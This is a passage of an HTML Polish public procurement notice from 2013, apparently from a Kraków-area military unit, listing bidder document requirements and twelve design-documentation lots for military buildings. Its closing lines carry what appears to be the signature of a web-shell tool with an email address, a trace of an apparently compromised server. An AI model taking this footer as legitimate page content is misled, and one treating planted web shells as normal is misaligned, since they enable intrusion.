<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.2.7.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Informacja ta ma być aktualna na dzień składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.35wog.mil.pl/przetargi-rok/2013<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
30-901 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 09:30, miejsce: Jednostka Wojskowa 3811
ul. Krakowska 2, Rząska
woj. małopolskie
Kancelaria jawna, budynek nr 1, pokój nr 116 (I piętro) w godzinach 8.00 - 10.00 i 13.00 - 15.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji kosztorysowych, specyfikacji technicznych oraz opisu przedmiotu zamówienia na wykonanie robót budowlanych, sanitarnych i elektrycznych w budynku nr  20 znajdującym się na terenie kompleksu wojskowego przy ul. Rakowickiej 29 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji kosztorysowych, specyfikacji technicznych oraz opisu przedmiotu zamówienia na wykonanie robót budowlanych, sanitarnych i elektrycznych w budynku nr  20 znajdującym się na terenie kompleksu wojskowego przy ul. Rakowickiej 29 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji kosztorysowych, specyfikacji technicznych oraz opisu przedmiotu zamówienia na wykonanie robót budowlanych, sanitarnych i elektrycznych w budynkach 
nr 5 i 6 znajdujących się na terenie kompleksu wojskowego przy ul. Montelupich 3 
w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji kosztorysowych, specyfikacji technicznych oraz opisu przedmiotu zamówienia na wykonanie robót budowlanych, sanitarnych i elektrycznych w budynkach 
nr 5 i 6 znajdujących się na terenie kompleksu wojskowego przy ul. Montelupich 3 
w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji kosztorysowych, specyfikacji technicznych oraz opisu przedmiotu zamówienia na wykonanie robót budowlanych, sanitarnych i elektrycznych w budynku nr 28 znajdującym się na terenie kompleksu wojskowego przy ul. Montelupich 3 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji kosztorysowych, specyfikacji technicznych oraz opisu przedmiotu zamówienia na wykonanie robót budowlanych, sanitarnych i elektrycznych w budynku nr 28 znajdującym się na terenie kompleksu wojskowego przy ul. Montelupich 3 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego, dokumentacji kosztorysowych, specyfikacji technicznych oraz opisu przedmiotu zamówienia na wykonanie robót budowlanych, sanitarnych i elektrycznych w budynku nr 16 objętym opieką konserwatorską (etap II) znajdującego się na terenie kompleksu wojskowego przy 
ul. Montelupich 3 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego, dokumentacji kosztorysowych, specyfikacji technicznych oraz opisu przedmiotu zamówienia na wykonanie robót budowlanych, sanitarnych i elektrycznych w budynku nr 16 objętym opieką konserwatorską (etap II) znajdującego się na terenie kompleksu wojskowego przy 
ul. Montelupich 3 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie projektu wykonawczego, dokumentacji kosztorysowej, specyfikacji technicznych oraz opisu przedmiotu zamówienia dla robót polegających na remoncie odcinków wewnętrznej sieci cieplnej niskich parametrów CO i CCWU w kompleksie wojskowym przy ul. Wrocławskiej 82 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie projektu wykonawczego, dokumentacji kosztorysowej, specyfikacji technicznych oraz opisu przedmiotu zamówienia dla robót polegających na remoncie odcinków wewnętrznej sieci cieplnej niskich parametrów CO i CCWU w kompleksie wojskowym przy ul. Wrocławskiej 82 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Opracowanie dokumentacji kosztorysowej, specyfikacji technicznych oraz opisu przedmiotu zamówienia dla robót polegających na konserwacji dachów budynków nr 1, 27, 28 znajdujących się na terenach kompleksów wojskowych przy ul. Tynieckiej 45 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji kosztorysowej, specyfikacji technicznych oraz opisu przedmiotu zamówienia dla robót polegających na konserwacji dachów budynków nr 1, 27, 28 znajdujących się na terenach kompleksów wojskowych przy ul. Tynieckiej 45 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz z dokumentacją kosztorysową, specyfikacją techniczną oraz opisem przedmiotu zamówienia dla robót polegających na odświeżeniu malatury korytarzy, klatek schodowych, renowacji posadzek w budynku nr 1 wraz z ułożeniem kostki brukowej na parkingu, naprawą sieci kanalizacyjnej przed budynkiem na terenie kompleksu wojskowego przy ul. Zyblikiewicza 1 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz z dokumentacją kosztorysową, specyfikacją techniczną oraz opisem przedmiotu zamówienia dla robót polegających na odświeżeniu malatury korytarzy, klatek schodowych, renowacji posadzek w budynku nr 1 wraz z ułożeniem kostki brukowej na parkingu, naprawą sieci kanalizacyjnej przed budynkiem na terenie kompleksu wojskowego przy ul. Zyblikiewicza 1 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Opracowanie audytu energetycznego, projektu budowlanego i wykonawczego, dokumentacji kosztorysowej, specyfikacji technicznych oraz opisu przedmiotu zamówienia dla robót polegających na ocieplaniu budynku nr 1 znajdującego się na terenie kompleksu wojskowego przy ul. Krakowskiej 2 w Rząsce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie audytu energetycznego, projektu budowlanego i wykonawczego, dokumentacji kosztorysowej, specyfikacji technicznych oraz opisu przedmiotu zamówienia dla robót polegających na ocieplaniu budynku nr 1 znajdującego się na terenie kompleksu wojskowego przy ul. Krakowskiej 2 w Rząsce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz 
z dokumentacją kosztorysową, specyfikacją techniczną oraz opisem przedmiotu zamówienia dla robót polegających na wymianie stolarki okiennej, remoncie pomieszczeń, dachu 
i wykonaniu obróbek blacharskich w budynku nr 11 znajdującym się na terenie kompleksu wojskowego przy ul. Ułanów 43 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz 
z dokumentacją kosztorysową, specyfikacją techniczną oraz opisem przedmiotu zamówienia dla robót polegających na wymianie stolarki okiennej, remoncie pomieszczeń, dachu 
i wykonaniu obróbek blacharskich w budynku nr 11 znajdującym się na terenie kompleksu wojskowego przy ul. Ułanów 43 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz z dokumentacją kosztorysową, specyfikacją techniczną oraz opisem przedmiotu zamówienia dla robót polegających na wymianie stolarki okiennej, remoncie pomieszczeń, dachu i wykonaniu obróbek blacharskich w budynku nr 15 znajdującym się na terenie kompleksu wojskowego przy ul. Ułanów 43 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz z dokumentacją kosztorysową, specyfikacją techniczną oraz opisem przedmiotu zamówienia dla robót polegających na wymianie stolarki okiennej, remoncie pomieszczeń, dachu i wykonaniu obróbek blacharskich w budynku nr 15 znajdującym się na terenie kompleksu wojskowego przy ul. Ułanów 43 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz opisem przedmiotu zamówienia dla robót polegających na wymianie stolarki okiennej, remoncie pomieszczeń w budynku nr 36 znajdującym się na terenie kompleksu wojskowego przy
 ul. Wrocławska 82 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz opisem przedmiotu zamówienia dla robót polegających na wymianie stolarki okiennej, remoncie pomieszczeń w budynku nr 36 znajdującym się na terenie kompleksu wojskowego przy
 ul. Wrocławska 82 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz 
z dokumentacją kosztorysową, specyfikacją techniczną oraz opisem przedmiotu zamówienia dla robót polegających na remoncie pomieszczeń  w budynku nr 16, 25, 28 znajdującym się na terenie kompleksu wojskowego przy ul. Rakowickiej 22 w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie programu prac konserwatorskich, projektu budowlanego i wykonawczego wraz 
z dokumentacją kosztorysową, specyfikacją techniczną oraz opisem przedmiotu zamówienia dla robót polegających na remoncie pomieszczeń  w budynku nr 16, 25, 28 znajdującym się na terenie kompleksu wojskowego przy ul. Rakowickiej 22 w Krakowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com